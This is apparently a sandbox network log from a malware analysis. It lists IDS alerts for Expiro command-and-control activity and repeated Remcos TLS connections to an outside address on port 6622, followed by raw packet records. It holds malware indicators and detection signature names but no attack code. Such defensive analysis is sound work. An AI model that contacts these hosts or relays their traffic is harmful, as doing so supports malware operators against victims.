                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:05.317102+02002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.45023518.208.156.24880TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:05.415429+02002051653ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz)1192.168.2.4590491.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:46.238828+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456577204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:47.785898+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456580204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:49.330624+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456584204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:50.919135+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456587204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:52.493302+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456590204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:54.170938+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456593204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:55.706849+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456596204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:57.240661+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456598204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:59.745594+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456602204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:32:03.009052+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456603204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:32:05.511413+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456604204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:32:08.029545+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456606204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:32:10.526331+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456607204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:32:13.022007+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456608204.10.160.2126622TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.098294973 CEST497336622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.098336935 CEST804973454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.098375082 CEST804973454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.098383904 CEST804973454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.098438978 CEST4973480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.098479033 CEST497336622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.098607063 CEST662249733204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.098647118 CEST804973454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.098650932 CEST497336622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.098684072 CEST4973480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.098766088 CEST662249733204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.098804951 CEST497336622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.099280119 CEST804973454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.099318027 CEST4973480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.099764109 CEST662249733204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.099803925 CEST497336622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.109760046 CEST4973480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.133925915 CEST804973454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.133956909 CEST804973218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.133999109 CEST4973280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.134473085 CEST804973454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.134531021 CEST804973218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.134571075 CEST4973280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.134962082 CEST804973454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.134972095 CEST662249733204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.135009050 CEST4973480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.135015965 CEST804973454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.141067982 CEST804973454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.141119957 CEST4973480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.150681019 CEST4973580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.155689001 CEST804973554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.155761003 CEST4973580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.155926943 CEST4973580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.155951977 CEST4973580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.160840988 CEST804973554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.160875082 CEST804973554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.240741014 CEST4973680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.245995045 CEST804973618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.246079922 CEST4973680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.246228933 CEST4973680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.246285915 CEST4973680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.251379013 CEST804973618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.251972914 CEST804973618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.917686939 CEST804973554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.917867899 CEST4973580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.917886972 CEST804973554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.918176889 CEST4973580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.924046993 CEST804973554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.953928947 CEST4973780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.959342957 CEST804973744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.959458113 CEST4973780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.959623098 CEST4973780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.959644079 CEST4973780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.965537071 CEST804973744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.965657949 CEST804973744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:01.331937075 CEST497386622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:01.337882996 CEST662249738204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.099049091 CEST804974544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.099126101 CEST4974580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.099329948 CEST4974580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.099348068 CEST4974580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.110622883 CEST4974680192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.332451105 CEST4974580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.363972902 CEST804974544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.364021063 CEST804974544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.364058018 CEST804974682.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.364140034 CEST4974680192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.364743948 CEST804974544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.364875078 CEST4974680192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.364906073 CEST4974680192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.369884014 CEST804974682.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.369955063 CEST804974682.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.578183889 CEST804974544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.578238010 CEST804974544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.578286886 CEST4974580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.578735113 CEST4974580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.583945036 CEST804974544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.830122948 CEST4974880192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.835530043 CEST8049748172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.835597038 CEST4974880192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.837467909 CEST4974880192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.837492943 CEST4974880192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.843540907 CEST8049748172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.843554974 CEST8049748172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:05.317154884 CEST662249744204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:05.317235947 CEST497446622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:05.317250967 CEST8049748172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:05.317316055 CEST4974880192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:05.317336082 CEST497446622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:05.317497015 CEST4974880192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:05.322446108 CEST662249744204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:05.322638035 CEST8049748172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:05.423805952 CEST4974980192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:05.428828001 CEST8049749172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:05.429285049 CEST4974980192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:05.429399967 CEST4974980192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:05.429419041 CEST4974980192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:05.434287071 CEST8049749172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:05.434628010 CEST8049749172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:05.931713104 CEST8049749172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:05.931781054 CEST4974980192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:05.939479113 CEST4974980192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:05.944369078 CEST8049749172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:06.121819019 CEST4975180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:06.128253937 CEST804975118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:06.128360033 CEST4975180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:06.130330086 CEST4975180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:06.130623102 CEST4975180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:06.137243032 CEST804975118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:06.137267113 CEST804975118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:06.418687105 CEST497526622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:06.420774937 CEST4975180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:06.423616886 CEST662249752204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:06.424521923 CEST497526622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:18.895612955 CEST497656622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:18.900583029 CEST662249765204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:18.902718067 CEST497656622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:18.906703949 CEST497656622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:18.911598921 CEST662249765204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:20.556896925 CEST662249765204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:20.556967974 CEST497656622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:20.557123899 CEST497656622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:20.566914082 CEST662249765204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:21.567265034 CEST497666622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:21.971627951 CEST662249766204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:21.971834898 CEST497666622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:21.976036072 CEST497666622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:21.980933905 CEST662249766204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:23.430002928 CEST662249766204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:23.430139065 CEST497666622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:23.430139065 CEST497666622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:23.435867071 CEST662249766204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:24.442353964 CEST497676622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:24.447339058 CEST662249767204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:24.447433949 CEST497676622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:24.454442978 CEST497676622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:24.459928989 CEST662249767204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:25.733659029 CEST804974682.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:25.734503031 CEST4974680192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:25.734586000 CEST4974680192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:25.739592075 CEST804974682.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:25.772372961 CEST4976880192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:25.779445887 CEST804976882.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:25.780006886 CEST4976880192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:25.780258894 CEST4976880192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:25.780284882 CEST4976880192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:25.785772085 CEST804976882.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:25.786252975 CEST804976882.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:25.925757885 CEST662249767204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:25.925867081 CEST497676622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:25.926003933 CEST497676622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:25.931658030 CEST662249767204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:26.942522049 CEST497696622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:26.947371960 CEST662249769204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:26.947453976 CEST497696622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:26.951155901 CEST497696622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:26.956031084 CEST662249769204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:28.410826921 CEST4976880192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:28.424073935 CEST662249769204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:28.424141884 CEST497696622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:28.424196005 CEST497696622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:28.429389000 CEST662249769204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:28.470452070 CEST4977080192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:28.479140043 CEST804977082.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:28.479217052 CEST4977080192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:28.479329109 CEST4977080192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:28.479382038 CEST4977080192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:28.484195948 CEST804977082.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:28.485035896 CEST804977082.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:29.426832914 CEST497716622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:29.431812048 CEST662249771204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.595331907 CEST804978913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.596451998 CEST804978913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.768115997 CEST4979080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.773169041 CEST804979047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.773243904 CEST4979080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.773391962 CEST4979080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.773411989 CEST4979080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.778177023 CEST804979047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.778395891 CEST804979047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.852670908 CEST662249783204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.852780104 CEST497836622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.852874041 CEST497836622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.858198881 CEST662249783204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.933912992 CEST804978913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.935019970 CEST804978913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.935071945 CEST4978980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.937645912 CEST4978980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.943893909 CEST804978913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.052234888 CEST4979680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.057080984 CEST804979644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.057164907 CEST4979680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.057308912 CEST4979680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.057342052 CEST4979680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.062489986 CEST804979644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.063033104 CEST804979644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.138302088 CEST804979047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.139133930 CEST804979047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.139199018 CEST4979080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.141671896 CEST4979080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.146545887 CEST804979047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.516211033 CEST804979644.221.84.105192.168.2.4
